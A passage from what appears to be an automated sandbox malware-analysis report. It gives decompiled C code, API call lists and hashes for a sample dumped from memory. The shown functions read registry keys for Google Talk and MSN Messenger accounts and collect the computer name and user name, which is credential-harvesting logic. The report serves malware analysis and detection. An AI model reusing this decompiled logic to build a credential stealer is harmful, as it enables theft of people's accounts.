                                                                                                                                                                          • Part of subcall function 004073B6: memset.MSVCRT ref: 00407418
                                                                                                                                                                          • Part of subcall function 004073B6: memset.MSVCRT ref: 0040742C
                                                                                                                                                                          • Part of subcall function 004073B6: memset.MSVCRT ref: 00407446
                                                                                                                                                                          • Part of subcall function 004073B6: memset.MSVCRT ref: 0040745B
                                                                                                                                                                          • Part of subcall function 004073B6: GetComputerNameA.KERNEL32 ref: 0040747D
                                                                                                                                                                          • Part of subcall function 004073B6: GetUserNameA.ADVAPI32(?,?), ref: 00407491
                                                                                                                                                                          • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074B0
                                                                                                                                                                          • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074C5
                                                                                                                                                                          • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074CE
                                                                                                                                                                          • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074DD
                                                                                                                                                                          • Part of subcall function 004073B6: memcpy.MSVCRT ref: 004074EF
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                        • memset.MSVCRT ref: 00407705
                                                                                                                                                                          • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                        • memset.MSVCRT ref: 00407756
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00407794
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004077BB
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Google\Google Talk\Accounts, xrefs: 004076D6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                        • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                        • API String ID: 2959138223-1079885057
                                                                                                                                                                        • Opcode ID: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
                                                                                                                                                                        • Instruction ID: a99152f29cb3baba476c483fa4670b136c65b11177ef5495e630776d68c42b47
                                                                                                                                                                        • Opcode Fuzzy Hash: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
                                                                                                                                                                        • Instruction Fuzzy Hash: 93219471408209BED610DE51DD42EABBBECEF84344F00043AB944D1192E635DD5D9BA7
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A6C6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 373 40a6c6-40a6d8 374 40a725-40a739 call 405e36 373->374 375 40a6da-40a6f0 call 406f55 _mbsicmp 373->375 397 40a73b call 40f1b0 374->397 398 40a73b call 40ef05 374->398 399 40a73b call 403c17 374->399 400 40a73b call 4047aa 374->400 401 40a73b call 4047fb 374->401 380 40a6f2-40a70b call 406f55 375->380 381 40a719-40a723 375->381 386 40a712 380->386 387 40a70d-40a710 380->387 381->374 381->375 382 40a73e-40a751 call 406f65 390 40a753-40a75f 382->390 391 40a798-40a7a7 SetCursor 382->391 389 40a713-40a714 call 40a283 386->389 387->389 389->381 393 40a761-40a76c 390->393 394 40a776-40a795 qsort 390->394 393->394 394->391 397->382 398->382 399->382 400->382 401->382
                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                        			E0040A6C6(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406F55(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L0041207E();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406F55(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A283(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E36();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406F65( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41848c == 0) {
						 *0x418490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41848c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A25D);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x417b98);
			}











                                                                                                                                                                        0x0040a6c9
                                                                                                                                                                        0x0040a6cb
                                                                                                                                                                        0x0040a6d3
                                                                                                                                                                        0x0040a6d8
                                                                                                                                                                        0x0040a6da
                                                                                                                                                                        0x0040a6dc
                                                                                                                                                                        0x0040a6e1
                                                                                                                                                                        0x0040a6e2
                                                                                                                                                                        0x0040a6e7
                                                                                                                                                                        0x0040a6f0
                                                                                                                                                                        0x0040a6f8
                                                                                                                                                                        0x0040a700
                                                                                                                                                                        0x0040a702
                                                                                                                                                                        0x0040a705
                                                                                                                                                                        0x0040a70b
                                                                                                                                                                        0x0040a712
                                                                                                                                                                        0x0040a70d
                                                                                                                                                                        0x0040a70d
                                                                                                                                                                        0x0040a70f
                                                                                                                                                                        0x0040a70f
                                                                                                                                                                        0x0040a713
                                                                                                                                                                        0x0040a714
                                                                                                                                                                        0x0040a714
                                                                                                                                                                        0x0040a719
                                                                                                                                                                        0x0040a71f
                                                                                                                                                                        0x0040a720
                                                                                                                                                                        0x0040a6da
                                                                                                                                                                        0x0040a725
                                                                                                                                                                        0x0040a730
                                                                                                                                                                        0x0040a73b
                                                                                                                                                                        0x0040a751
                                                                                                                                                                        0x0040a759
                                                                                                                                                                        0x0040a75f
                                                                                                                                                                        0x0040a767
                                                                                                                                                                        0x0040a76c
                                                                                                                                                                        0x0040a76c
                                                                                                                                                                        0x0040a782
                                                                                                                                                                        0x0040a790
                                                                                                                                                                        0x0040a795
                                                                                                                                                                        0x0040a7a7

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                        • String ID: /nosort$/sort
                                                                                                                                                                        • API String ID: 882979914-1578091866
                                                                                                                                                                        • Opcode ID: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                                                                                                                                                                        • Instruction ID: d235f9a75b77abe912022d820ae93ced97f95949ab3107a8ace45c524b087071
                                                                                                                                                                        • Opcode Fuzzy Hash: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 5421C170704602EFC719EF75C884A95B7A9FF48314B10413EF529A7291DB39AC218B8A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F4CA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registrystringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 402 40f4ca-40f4e1 call 40f41d 405 40f4e3-40f4ec call 406282 402->405 406 40f50c-40f52a memset 402->406 414 40f4fd-40f500 405->414 415 40f4ee-40f4f1 405->415 408 40f536-40f544 406->408 409 40f52c-40f52f 406->409 412 40f554-40f55e call 40f1b0 408->412 409->408 411 40f531-40f534 409->411 411->408 416 40f546-40f54f 411->416 419 40f560-40f588 call 40f44c call 40f1f1 RegCloseKey 412->419 420 40f58e-40f5a1 strcpy 412->420 422 40f507 414->422 415->406 418 40f4f3-40f4f6 415->418 416->412 418->406 421 40f4f8-40f4fb 418->421 419->420 424 40f5a4-40f5a6 420->424 421->406 421->414 422->424
                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                        			E0040F4CA(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040F41D();
				if( *0x41851c == 0 ||  *((intOrPtr*)(E00406282() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040F1B0() == 0) {
						E0040F44C(_t38);
						E0040F1F1(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41851c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}










                                                                                                                                                                        0x0040f4ca
                                                                                                                                                                        0x0040f4ca
                                                                                                                                                                        0x0040f4d4
                                                                                                                                                                        0x0040f4e1
                                                                                                                                                                        0x0040f519
                                                                                                                                                                        0x0040f51f
                                                                                                                                                                        0x0040f52a
                                                                                                                                                                        0x0040f539
                                                                                                                                                                        0x0040f53a
                                                                                                                                                                        0x0040f53f
                                                                                                                                                                        0x0040f546
                                                                                                                                                                        0x0040f549
                                                                                                                                                                        0x0040f54a
                                                                                                                                                                        0x0040f54f
                                                                                                                                                                        0x0040f54f
                                                                                                                                                                        0x0040f55e
                                                                                                                                                                        0x0040f565
                                                                                                                                                                        0x0040f57d
                                                                                                                                                                        0x0040f588
                                                                                                                                                                        0x0040f588
                                                                                                                                                                        0x0040f596
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f4fd
                                                                                                                                                                        0x0040f501
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040f501

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F41D: LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,73B74DE0,?,00000000), ref: 0040F42B
                                                                                                                                                                          • Part of subcall function 0040F41D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                                                                                                                                                                        • memset.MSVCRT ref: 0040F51F
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                                                                                                                                                                        • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                                                                                                                                                                          • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040F53A, 0040F54A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                        • API String ID: 181880968-2036018995
                                                                                                                                                                        • Opcode ID: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                                                                                                                                                                        • Instruction ID: 8c400c1df07908664f594f880775229253182a5e7b911f92c7f22337ad7f8634
                                                                                                                                                                        • Opcode Fuzzy Hash: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                                                                                                                                                                        • Instruction Fuzzy Hash: 34119971801114BADB30AA989C899DF77AC9715308F5400BBFD51B2593D6385F9C8A99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403946 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 428 403946-403983 call 4046e1 431 403988-40398c 428->431 432 4039b9-4039be 431->432 433 40398e-4039a3 RegOpenKeyExA 431->433 434 4039c0-4039d5 RegOpenKeyExA 432->434 435 4039dd-4039e1 call 40dc39 432->435 436 4039b5-4039b7 433->436 437 4039a5 433->437 434->436 439 4039d7-4039db 434->439 438 4039e6-4039ea 435->438 436->438 441 4039a9-4039b3 call 40db04 437->441 442 4039f9-403a02 438->442 443 4039ec-4039f4 call 4038a9 438->443 439->441 441->438 442->431 446 403a04-403a16 call 4047fb 442->446 443->442
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00403946(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x413eb0;
				E004046E1( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040DC39( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040DB04( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038A9(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047FB( &_v528);
			}


















                                                                                                                                                                        0x00403946
                                                                                                                                                                        0x0040395c
                                                                                                                                                                        0x00403967
                                                                                                                                                                        0x00403972
                                                                                                                                                                        0x00403974
                                                                                                                                                                        0x00403978
                                                                                                                                                                        0x0040397f
                                                                                                                                                                        0x00403988
                                                                                                                                                                        0x0040398c
                                                                                                                                                                        0x004039b9
                                                                                                                                                                        0x004039be
                                                                                                                                                                        0x004039e1
                                                                                                                                                                        0x004039c0
                                                                                                                                                                        0x004039d1
                                                                                                                                                                        0x004039d3
                                                                                                                                                                        0x004039d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004039d7
                                                                                                                                                                        0x004039d7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004039d7
                                                                                                                                                                        0x004039d5
                                                                                                                                                                        0x0040398e
                                                                                                                                                                        0x0040399f
                                                                                                                                                                        0x004039a3
                                                                                                                                                                        0x004039b5
                                                                                                                                                                        0x004039b5
                                                                                                                                                                        0x004039a5
                                                                                                                                                                        0x004039a5
                                                                                                                                                                        0x004039a9
                                                                                                                                                                        0x004039ae
                                                                                                                                                                        0x004039ae
                                                                                                                                                                        0x004039a3
                                                                                                                                                                        0x004039e6
                                                                                                                                                                        0x004039ea
                                                                                                                                                                        0x004039f4
                                                                                                                                                                        0x004039f4
                                                                                                                                                                        0x004039f9
                                                                                                                                                                        0x004039fd
                                                                                                                                                                        0x00403a16

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040399F
                                                                                                                                                                          • Part of subcall function 0040DC39: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                                                                                                                                                                          • Part of subcall function 0040DC39: strlen.MSVCRT ref: 0040DD15
                                                                                                                                                                          • Part of subcall function 0040DC39: strcpy.MSVCRT(?,?), ref: 0040DD26
                                                                                                                                                                          • Part of subcall function 0040DC39: LocalFree.KERNEL32(?), ref: 0040DD33
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039D1
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\MSNMessenger, xrefs: 00403999
                                                                                                                                                                        • Software\Microsoft\MessengerService, xrefs: 004039CB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                        • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                                                                                                        • API String ID: 1910562259-1741179510
                                                                                                                                                                        • Opcode ID: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
                                                                                                                                                                        • Instruction ID: a8690c8f59c2d6ddd84299c782105f2e65a9bc437c951c5f77a69b85a32d1474
                                                                                                                                                                        • Opcode Fuzzy Hash: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
                                                                                                                                                                        • Instruction Fuzzy Hash: 1111D8B1108309AED320EE5198818ABBFEC9B95355F50843FF544A2081D3789A4DCAAB
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F37C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040F37C(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x418110 =  *0x418110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}











                                                                                                                                                                        0x0040f389
                                                                                                                                                                        0x0040f38f
                                                                                                                                                                        0x0040f393
                                                                                                                                                                        0x0040f3a0
                                                                                                                                                                        0x0040f3a4
                                                                                                                                                                        0x0040f3aa
                                                                                                                                                                        0x0040f3b2
                                                                                                                                                                        0x0040f3b5
                                                                                                                                                                        0x0040f3bd
                                                                                                                                                                        0x0040f3c1
                                                                                                                                                                        0x0040f3c4
                                                                                                                                                                        0x0040f3c7
                                                                                                                                                                        0x0040f3c9
                                                                                                                                                                        0x0040f3c9
                                                                                                                                                                        0x0040f3cd
                                                                                                                                                                        0x0040f3d0
                                                                                                                                                                        0x0040f3e0
                                                                                                                                                                        0x0040f3e2
                                                                                                                                                                        0x0040f3e6
                                                                                                                                                                        0x0040f3e6
                                                                                                                                                                        0x0040f3ea
                                                                                                                                                                        0x0040f3f4
                                                                                                                                                                        0x0040f3f4
                                                                                                                                                                        0x0040f3bd
                                                                                                                                                                        0x0040f3b2
                                                                                                                                                                        0x0040f3f9
                                                                                                                                                                        0x0040f3ff

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0040F389
                                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040F39A
                                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0040F3AA
                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 0040F3B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                                                        • Opcode ID: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
                                                                                                                                                                        • Instruction ID: 02aaebfec467b3bf7519b160cf801d0b857f87d6ebd9b35fbb0925b6dc32657f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
                                                                                                                                                                        • Instruction Fuzzy Hash: B601D6327002156BCB294FA5DC45A9BBFAEFF857A1704803AFC09E72A1DB70C905D6C8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F0E3 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                        			E0040F0E3(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E00412360(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x41344f,  &_v8200, 0x2000, _a20); // executed
					_t23 = E0040680B( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406792(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}








                                                                                                                                                                        0x0040f0eb
                                                                                                                                                                        0x0040f0f6
                                                                                                                                                                        0x0040f0fc
                                                                                                                                                                        0x0040f146
                                                                                                                                                                        0x0040f164
                                                                                                                                                                        0x0040f174
                                                                                                                                                                        0x0040f0fe
                                                                                                                                                                        0x0040f10b
                                                                                                                                                                        0x0040f112
                                                                                                                                                                        0x0040f11b
                                                                                                                                                                        0x0040f12f
                                                                                                                                                                        0x0040f12f
                                                                                                                                                                        0x0040f17e

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040F10B
                                                                                                                                                                          • Part of subcall function 00406792: sprintf.MSVCRT ref: 004067CA
                                                                                                                                                                          • Part of subcall function 00406792: memcpy.MSVCRT ref: 004067DD
                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040F12F
                                                                                                                                                                        • memset.MSVCRT ref: 0040F146
                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(?,?,0041344F,?,00002000,?), ref: 0040F164
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3143880245-0
                                                                                                                                                                        • Opcode ID: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                                                                                                                                                                        • Instruction ID: bc019f7bd72990c6dd937b38e23e5507a0673011dafb680486f8cad4f2b6b185
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                                                                                                                                                                        • Instruction Fuzzy Hash: DF01657240421DAFEF16AF50DD89EDB7B79EF04344F104076B609A1052D6359A64DB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004123F2 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                        			E004123F2() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x418528;
				if(_t1 != 0) {
					_push(_t1);
					L00412096();
				}
				_t2 =  *0x418530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L00412096(); // executed
				}
				_t3 =  *0x41852c;
				if(_t3 != 0) {
					_push(_t3);
					L00412096();
				}
				_t4 =  *0x418534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L00412096(); // executed
					return _t4;
				}
				return _t4;
			}







                                                                                                                                                                        0x004123f2
                                                                                                                                                                        0x004123f9
                                                                                                                                                                        0x004123fb
                                                                                                                                                                        0x004123fc
                                                                                                                                                                        0x00412401
                                                                                                                                                                        0x00412402
                                                                                                                                                                        0x00412409
                                                                                                                                                                        0x0041240b
                                                                                                                                                                        0x0041240c
                                                                                                                                                                        0x00412411
                                                                                                                                                                        0x00412412
                                                                                                                                                                        0x00412419
                                                                                                                                                                        0x0041241b
                                                                                                                                                                        0x0041241c
                                                                                                                                                                        0x00412421
                                                                                                                                                                        0x00412422
                                                                                                                                                                        0x00412429
                                                                                                                                                                        0x0041242b
                                                                                                                                                                        0x0041242c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412431
                                                                                                                                                                        0x00412432

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                                        • Opcode ID: fb7313e2089ba82f806a054faa6efc2dc291e3dbde93792c84ca6474672037a6
